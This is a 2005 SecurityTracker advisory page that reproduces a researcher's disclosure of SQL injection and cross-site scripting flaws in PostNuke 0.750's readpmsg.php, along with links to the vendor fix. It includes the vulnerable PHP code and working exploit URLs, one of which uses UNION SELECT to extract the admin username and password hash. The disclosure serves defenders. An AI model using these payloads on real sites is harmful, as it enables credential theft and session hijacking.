Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
|
|
|
|
|
|
|
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
|
|
|
|
Become a Partner and License Our Database or Notification Service
|
|
|
|
|
|
|
|
|
|
|
|
|
|
PostNuke Input Validation Error in 'readpmsg.php' Permits SQL Injection and Cross-Site Scripting Attacks
|
|
SecurityTracker Alert ID: 1014066
|
|
SecurityTracker URL: http://securitytracker.com/id?1014066
|
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: May 27 2005
|
Impact: Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information, User access via network
|
Fix Available: Yes
Exploit Included: Yes
Vendor Confirmed: Yes
|
Version(s): 0.750 and prior versions
|
Description: sp3x from SecurityReason reported some input validation vulnerabilities in PostNuke. A remote user can inject SQL commands. A remote user can also conduct cross-site scripting attacks.
The '/modules/Messages/readpmsg.php' script does not properly validate user-supplied input in the 'start' parameter. A remote user
can supply specially crafted parameter inputs to execute SQL commands on the underlying database.
A demonstration exploit URL
is provided:
http://[target]/[postnuke_dir]/modules.php?op=modload&name=Messages&file=readpmsg&start=0%20UNION%20SELECT%20pn_uname,null,pn_uname,pn_pass,pn_p
A
remote user can also create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be
executed by the target user's browser. The code will originate from the site running the PostNuke software and will run in the
security context of that site. As a result, the code will be able to access the target user's cookies (including authentication
cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take
actions on the site acting as the target user.
A demonstration exploit URL is provided:
http://[target]/[postnuke_dir]/modules.php?op=modload&name=Messages&file=rea
dpmsg&start=0'<h1>cXIb8O3
and sp3x - SecurityReason</h1>&total_messages=1
|
Impact: A remote user can execute SQL commands on the underlying database.
A remote user can access the target user's cookies (including
authentication cookies), if any, associated with the site running the PostNuke software, access data recently submitted by the target
user via web form to the site, or take actions on the site acting as the target user.
|
Solution: The vendor has issued a fixed version (0.750b).
1. PostNuke 0.750 (tar.gz format)
http://news.postnuke.com/Downloads-index-req-viewdownloaddetails-lid-411.html
SHA1:
60ef6f7c93cfa638fc7d089e078db0eaa59f95b4
MD5: c40ebc31cfa3ada351dbe63f4e9a6255
Size: 2407332 Bytes
2. PostNuke 0.750 (zip format)
http://news.postnuke.com/Downloads
-index-req-viewdownloaddetails-lid-410.html
SHA1: 50edfbb3c12bed0b80413d421d1a90ff28ed0c22
MD5: 26dc0202c776f7463008c54ce8cf89b9
Size:
3501230 Bytes
3. Security Fix (changed files only) for PostNuke 0.750 (tar.gz format)
http://news.postnuke.com/Downloads-index-req-viewdownloaddetails-lid-471.html
S
HA1: 6e76d92124c833618d02dfdb87d699374120967d
MD5: a007e741be11389a986b1d8928a6c0e5
Size: 160550 Bytes
4. Security Fix (changed
files only) for PostNuke 0.750 (.zip format)
http://news.postnuke.com/Downloads-index-req-viewdownloaddetails-lid-472.html
SHA1:
d504155418ab6d07491b3a6c0d18834fe20bbefd
MD5: e472c9917e2ff237b354bdc87838c504
Size: 247175 Bytes
|
Vendor URL: www.postnuke.com/ (Links to External Site)
|
Cause: Input validation error
|
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
|
Reported By: "SecurityReason" <sp3x@securityreason.com>
|
Message History:
None.
|
Source Message Contents
|
Date: Fri, 27 May 2005 17:36:06 +0200
From: "SecurityReason" <sp3x@securityreason.com>
Subject: [SECURITYREASON.COM] PostNuke Critical SQL Injection and XSS 0.750=>x
|
-=[ Critical SQL injection and XSS in PostNuke ]=-
Author: sp3x
Date: 27. May 2005
Affected software :
===================
PostNuke version : x=> 0.750
Description :
=============
PostNuke is an open source, open developement content management system
(CMS). PostNuke started as a fork from PHPNuke (http://www.phpnuke.org) and
provides many enhancements and improvements over the PHP-Nuke system. PostNuke
is still undergoing development but a large number of core functions are now
stabilising and a complete API for third-party developers is now in place.
If you would like to help develop this software, please visit our homepage
at http://noc.postnuke.com/
You can also visit us on our IRC Server irc.postnuke.com channel
#postnuke-support
#postnuke-chat
#postnuke
Or at the Community Forums located at:
http://forums.postnuke.com/
Vulnerabilities :
*****************
Critical SQL injection :
========================
Code :
------
/modules/Messages/readpmsg.php
=======================
$sql = "SELECT $column[msg_id] AS \"msg_id\",
$column[msg_image] AS \"msg_image\",
$column[subject] AS \"subject\",
$column[from_userid] AS \"from_userid\",
$column[to_userid] AS \"to_userid\",
$column[msg_time] AS \"msg_time\",
$column[msg_text] AS \"msg_text\",
$column[read_msg] AS \"read_msg\"
FROM $pntable[priv_msgs]
WHERE $column[to_userid]='" . (int)pnVarPrepForStore($userdata) . "'";
$resultID =& $dbconn->SelectLimit($sql,1,$start);
if($dbconn->ErrorNo()<>0) {
error_log("DB Error: " . $dbconn->ErrorMsg());
echo $dbconn->ErrorMsg() . "<br />";
forumerror(0005);
}
=======================
First lets login -in as user in postnuke. Then send the message to yourself.
After that go to :
http://[target]/[postnuke_dir]/modules.php?op=modload&name=Messages&file=readpmsg&start=0
[SQL inj]&total_messages=1
Note :
------
total_messages=1 - the id of total_messages must exist
Now you will see this error message
error message :
---------------
========================
You have an error in your SQL syntax; check the manual that corresponds to your MySQL
server version for the right syntax to use near '[SQL injection],1' at line 10
========================
Exploit SQL injection :
=======================
http://[target]/[postnuke_dir]/modules.php?op=modload&name=Messages&file=readpmsg&start=0
%20UNION%20SELECT%20pn_uname,null,pn_uname,pn_pass,pn_pass,null,pn_pass,null%20FROM%20pn_users%20WHER
E%20pn_uid=2/*&total_messages=1
And we can see the admin md5 password and nick :)
Cross-site scripting - XSS :
============================
Thanks to error message we can also perform XSS attacks :)
Example :
---------
http://[target]/[postnuke_dir]/modules.php?op=modload&name=Messages&file=readpmsg&start=0
'<h1>cXIb8O3
and sp3x - SecurityReason</h1>&total_messages=1
And we get :
error message :
---------------
========================
You have an error in your SQL syntax; check the manual that corresponds to your MySQL
server version for the right syntax to use near ''[Our XSS],1' at line 10
========================
How to fix :
============
PNSA 2005-2
Security Fix (changed files only) for PostNuke 0.750 (tar.gz format)
http://news.postnuke.com/Downloads-index-req-viewdownloaddetails-lid-471.html
SHA1: 6e76d92124c833618d02dfdb87d699374120967d
MD5: a007e741be11389a986b1d8928a6c0e5
Size: 160550 Bytes
or CVS
Greets :
========
cXIb8O3 and pkw :)
Contact :
=========
sp3x[at]securityreason[dot].com
www.securityreason.com
|
|
Go to the Top of This SecurityTracker Archive Page
|
